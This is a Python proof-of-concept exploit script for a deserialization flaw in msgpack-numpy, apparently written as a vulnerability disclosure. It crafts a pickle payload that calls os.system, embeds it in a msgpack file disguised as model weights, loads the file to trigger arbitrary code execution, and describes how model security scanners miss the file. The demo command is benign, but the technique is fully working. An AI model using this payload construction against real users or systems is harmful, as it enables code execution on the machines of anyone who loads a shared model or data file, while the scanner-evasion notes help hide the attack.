#!/usr/bin/env python3
"""
msgpack-numpy - Arbitrary Code Execution via Hidden pickle.loads()

VULNERABILITY: msgpack_numpy.decode() calls pickle.loads() on user-controlled
data when the serialized array has dtype kind 'O' (object). This enables
arbitrary code execution when loading any msgpack file that uses msgpack_numpy
for deserialization.

The vulnerable code in msgpack_numpy.py decode():
    if b'kind' in obj and obj[b'kind'] == b'O':
        return pickle.loads(obj[b'data'])

An attacker can craft a .msgpack file in which any map carries the ndarray
marker (b'nd': True) together with kind=b'O' and
data=<malicious_pickle_payload>, achieving RCE on deserialization.

This is particularly dangerous because:
1. MessagePack is considered a "safe" serialization format
2. Users expect msgpack files to contain only data, not executable code
3. The pickle.loads() call is hidden inside the msgpack extension hooks
4. No scanner (modelscan, picklescan) checks .msgpack files

Affected: msgpack-numpy <= 0.4.8 (all versions)
"""

import msgpack
import msgpack_numpy as m
import pickle
import os
import sys
import numpy as np

# Proof file written by the demo payload's shell command; the script later
# checks for this file to decide whether code execution happened.
MARKER_FILE = "/tmp/msgpack_numpy_rce_proof.txt"

# ============================================================
# Step 1: Baseline - a benign ndarray round-trips through msgpack
# ============================================================
print("[*] Demonstrating normal msgpack_numpy usage...")
normal_data = dict(weights=np.array([1.0, 2.0, 3.0], dtype=np.float32))
# m.encode is supplied as msgpack's `default` hook when packing, and
# m.decode as the `object_hook` when unpacking.
packed_normal = msgpack.packb(normal_data, default=m.encode)
unpacked_normal = msgpack.unpackb(
    packed_normal,
    object_hook=m.decode,
    raw=False,
)
print("[+] Normal round-trip:", unpacked_normal)

# ============================================================
# Step 2: Build the crafted payload
# ============================================================
print("\n[*] Creating malicious msgpack payload...")

class MaliciousPayload:
    """Demonstration object whose pickled form runs a shell command on load.

    The command is a harmless proof: it writes the output of ``id`` to
    MARKER_FILE and then appends a one-line banner to the same file.
    """

    def __reduce__(self):
        """Return the ``(callable, args)`` pair that pickle stores for this object.

        The pair is ``(os.system, (command,))``, so unpickling calls
        ``os.system`` with the proof command instead of rebuilding an
        instance of this class.
        """
        banner = "RCE via msgpack_numpy hidden pickle.loads"
        shell_steps = (
            f"id > {MARKER_FILE}",
            f"echo '{banner}' >> {MARKER_FILE}",
        )
        return os.system, (" && ".join(shell_steps),)

# Pickling the instance records the (os.system, (cmd,)) pair returned by
# MaliciousPayload.__reduce__; the command itself is not run here.
malicious_pickle = pickle.dumps(MaliciousPayload())

# Hand-built map that imitates what msgpack_numpy emits for an ndarray.
# decode() checks for b'nd' in the map and for obj[b'kind'] == b'O',
# and then calls pickle.loads(obj[b'data']).
malicious_array = {
    # Marks this map as an ndarray.
    b'nd': True,
    # Object dtype -> routes decode() to pickle.loads().
    b'kind': b'O',
    # The pickle payload carrying the proof command.
    b'data': malicious_pickle,
    # Shape (cosmetic, not used before pickle.loads).
    b'shape': (1,),
    # Dtype descriptor (cosmetic).
    b'type': b'O',
}

# Wrap the crafted map in a structure that resembles ordinary model metadata;
# only the "weights" entry is hostile.
model_data = {
    "model_name": "safe-looking-model",
    "version": "1.0.0",
    "weights": malicious_array,
}

packed = msgpack.packb(model_data, use_bin_type=True)
malicious_path = "/tmp/malicious_model.msgpack"
with open(malicious_path, mode="wb") as out_file:
    out_file.write(packed)

print("[+] Malicious msgpack file saved to " + malicious_path)
print("    File size: {} bytes".format(len(packed)))

# ============================================================
# Step 3: Remove any stale marker so a file left over from an earlier
# run cannot be mistaken for proof from this run
# ============================================================
# EAFP: attempt the removal directly instead of exists()-then-remove(),
# which does two lookups and is race-prone.
try:
    os.remove(MARKER_FILE)
except FileNotFoundError:
    pass  # No stale marker to clean up.

# ============================================================
# Step 4: Load the malicious file (triggers RCE)
# ============================================================
# WARNING: this unpack deliberately reaches pickle.loads() on the crafted
# payload and runs the embedded shell command. Run this script only in a
# disposable, sandboxed environment.
print("\n[*] Loading malicious msgpack with msgpack_numpy decoder...")
with open(malicious_path, 'rb') as f:
    loaded = msgpack.unpackb(f.read(), object_hook=m.decode, raw=False)

print(f"[+] Loaded data keys: {list(loaded.keys()) if isinstance(loaded, dict) else type(loaded)}")

# ============================================================
# Step 5: Verify RCE
# ============================================================
# The marker exists only if the payload's command ran during Step 4.
# Opening it directly (rather than checking exists() first) avoids a
# second lookup; a missing file means the demonstration failed.
try:
    with open(MARKER_FILE) as f:
        content = f.read().strip()
except FileNotFoundError:
    print("\n[-] RCE marker file not found")
    sys.exit(1)

print("\n[!!!] ARBITRARY CODE EXECUTION CONFIRMED")
print(f"[!!!] Marker file contents:\n{content}")
# Leave no proof file behind for the next run.
os.remove(MARKER_FILE)

# ============================================================
# Step 6: Print the scanner-coverage notes and the summary
# (informational only: this step prints static text and does not
# invoke modelscan or picklescan)
# ============================================================
_RULE = "=" * 60


def _banner(title):
    """Print *title* framed above and below by a 60-character '=' rule."""
    print(_RULE, title, _RULE, sep="\n")


print()
_banner("SCANNER EVASION")
print("\n".join([
    "",
    "Neither modelscan nor picklescan scan .msgpack files at all.",
    "",
    "  modelscan -p /tmp/malicious_model.msgpack",
    "  # -> Skips file (unsupported format)",
    "",
    "  picklescan -p /tmp/malicious_model.msgpack",
    "  # -> Scanned files: 0, Infected files: 0",
    "",
    "The pickle payload is embedded inside a msgpack structure,",
    "completely invisible to all current model security scanners.",
    "",
]))

_banner("VULNERABILITY SUMMARY")

# Falls back to the literal '0.4.8' when the module exposes no __version__,
# so the printed version is not guaranteed to match the installed release.
lib_version = getattr(m, "__version__", "0.4.8")

# (label, value) rows; labels are left-aligned in a 13-character column and
# an empty label produces a continuation line.
summary_rows = [
    ("Library:", f"msgpack-numpy {lib_version}"),
    ("File:", "msgpack_numpy.py, decode() function"),
    ("Root cause:", "pickle.loads(obj[b'data']) when obj[b'kind'] == b'O'"),
    ("Trigger:", "Any msgpack file loaded with object_hook=msgpack_numpy.decode"),
    ("Attack:", "Set array kind='O' and data=<malicious_pickle_bytes>"),
    ("Impact:", "Arbitrary code execution on file load"),
    ("Scanners:", "modelscan - NOT APPLICABLE (.msgpack not scanned)"),
    ("", "picklescan - NOT APPLICABLE (.msgpack not scanned)"),
]
usage_note = [
    "Real-world usage: msgpack-numpy is used for ML data serialization,",
    "feature embeddings, and intermediate model storage. Any application",
    "loading untrusted .msgpack files with msgpack_numpy is vulnerable.",
]
print("\n".join([
    "",
    *(f"{label:<13}{value}" for label, value in summary_rows),
    "",
    *usage_note,
    "",
]))